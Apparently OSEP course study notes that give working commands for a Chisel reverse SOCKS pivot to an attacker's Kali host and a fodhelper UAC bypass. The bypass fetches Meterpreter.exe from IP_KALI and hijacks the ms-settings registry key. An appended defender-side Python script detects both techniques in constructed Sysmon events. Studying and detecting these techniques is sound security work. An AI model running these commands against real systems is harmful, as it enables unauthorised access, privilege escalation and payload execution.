
OSEP Additional Note

1. Pivot with Chisel


Upload chisel/chisel.exe from Kali to c:\windows\tasks on the victim server.
Check your proxychains config on your Kali at /etc/proxychains4.conf. It must open
a port to listen on as a proxy server.

On my Kali, I config Proxychains to use port 1080 as the proxy server listener port.
On your Kali, run the following command to create one Chisel server:

./chisel server -p 8080 --socks5 --reverse

This command will instruct Chisel to use the socks5 info in /etc/proxychains to create
a Chisel server whose listening port is 1085.
On the victim, run a Chisel client to connect a tunnel to the Chisel server on our Kali:

.\chisel.exe client -v 192.168.49.109:8080 R:1080:socks

Both chisel and chisel.exe take the same command line as above.

If successful, this Listening line will appear on the Chisel server on Kali:

→ After that, you can use proxychains to pivot any command from your Kali directly into the
internal network:

proxychains4 ssh internal.user@internal.host


proxychains mongo "mongodb://internal.host:27017/internal_service"
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py username:passwd@internal.host

2. FodHelper bypass UAC


fodhelper.exe must be run from an x64 shell. Check your shell with: [Environment]::Is64BitProcess

# Put the payload in c:\windows\tasks\Meterpreter.exe

Invoke-WebRequest -Uri http://IP_KALI/Meterpreter.exe -OutFile c:\windows\tasks\Meterpreter.exe;

# Configure the exploit

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\\windows\\tasks\\Meterpreter.exe" -Force

# Run it! And FodHelper will execute our c:\windows\tasks\Meterpreter.exe

C:\Windows\System32\fodhelper.exe

Sometimes you need to build your Meterpreter.exe with process hollowing plus encrypted
shellcode for AV evasion.
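Added example, written from the defender's side and not part of the original notes: detection logic for both techniques above, the Chisel reverse SOCKS tunnel of section 1 and the fodhelper.exe ms-settings handler hijack of section 2, run over a handful of constructed Sysmon-style events. Field names follow Sysmon conventions (Event ID 1 process creation, Event ID 13 registry value set); the hostnames, SID, user names and the benign events are assumptions made up for the example, while the command line and registry path are the ones the notes show.

```python
"""Defender-side detection for the two techniques in these notes: a Chisel
reverse SOCKS tunnel (section 1) and the fodhelper.exe ms-settings handler
hijack (section 2). Added example, not part of the original notes.
Event fields follow Sysmon naming (Event ID 1 = process creation,
Event ID 13 = registry value set); the events below are constructed."""

import re

# Constructed sample telemetry. The SID, users and the benign ssh/explorer
# events are made up; the chisel command line and registry path reuse what
# the notes above show.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\Tasks\\chisel.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "chisel.exe client -v 192.168.49.109:8080 R:1080:socks",
     "User": "CORP\\svc_web"},
    {"EventID": 1, "Image": "C:\\Program Files\\Git\\usr\\bin\\ssh.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "ssh -D 1080 build@ci.internal",          # benign admin use
     "User": "CORP\\dev1"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes"
                     "\\ms-settings\\Shell\\Open\\command\\DelegateExecute",
     "Details": "(Empty)", "User": "CORP\\svc_web"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes"
                     "\\ms-settings\\Shell\\Open\\command\\(Default)",
     "Details": "C:\\\\windows\\\\tasks\\\\Meterpreter.exe", "User": "CORP\\svc_web"},
    {"EventID": 1, "Image": "C:\\Windows\\Tasks\\Meterpreter.exe",
     "ParentImage": "C:\\Windows\\System32\\fodhelper.exe",
     "CommandLine": "C:\\windows\\tasks\\Meterpreter.exe", "User": "CORP\\svc_web"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\fodhelper.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",               # normal launch
     "CommandLine": "fodhelper.exe", "User": "CORP\\dev1"},
]

# Chisel's reverse SOCKS syntax from the notes: "client <server> R:<port>:socks".
CHISEL_REVERSE_SOCKS = re.compile(r"\bclient\b.*\bR:\d+:socks\b", re.IGNORECASE)

# Per-user ms-settings handler key; fodhelper.exe consults it when launched.
# Sysmon logs HKCU as HKU\<SID>, so match on the tail of the path only.
MS_SETTINGS_CMD = re.compile(
    r"\\software\\classes\\ms-settings\\shell\\open\\command\\", re.IGNORECASE)


def detect_chisel_tunnel(events):
    """Flag process creations whose command line carries Chisel's
    reverse SOCKS syntax, regardless of what the binary was renamed to."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        if CHISEL_REVERSE_SOCKS.search(ev.get("CommandLine", "")):
            hits.append({"rule": "chisel_reverse_socks",
                         "image": ev["Image"], "user": ev["User"]})
    return hits


def detect_fodhelper_hijack(events):
    """Two signals for the handler hijack: (1) any value written under
    ...\\ms-settings\\Shell\\Open\\command (DelegateExecute or the default
    value), (2) fodhelper.exe spawning a child outside System32."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 13 and MS_SETTINGS_CMD.search(ev.get("TargetObject", "")):
            hits.append({"rule": "ms_settings_handler_write",
                         "target": ev["TargetObject"],
                         "details": ev.get("Details", ""), "user": ev["User"]})
        elif eid == 1 and ev.get("ParentImage", "").lower().endswith("\\fodhelper.exe"):
            child = ev.get("Image", "")
            if not child.lower().startswith("c:\\windows\\system32\\"):
                hits.append({"rule": "fodhelper_unexpected_child",
                             "image": child, "user": ev["User"]})
    return hits


def correlate_by_user(events):
    """Group hits from both detectors by account, so a tunnel followed by a
    UAC bypass under the same user reads as one chain rather than two alerts."""
    by_user = {}
    for hit in detect_chisel_tunnel(events) + detect_fodhelper_hijack(events):
        by_user.setdefault(hit["user"], []).append(hit["rule"])
    return by_user


if __name__ == "__main__":
    for user, rules in correlate_by_user(SAMPLE_EVENTS).items():
        print(user, "->", rules)
```

The registry rule is the robust one: the handler key under the user's hive has no legitimate reason to exist, so any write to it is worth an alert (ATT&CK T1548.002), whereas the Chisel regex only catches the unmodified client syntax. The child-process rule is also a convenient remediation hook, since deleting the HKCU ms-settings key returns fodhelper.exe to normal behaviour.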
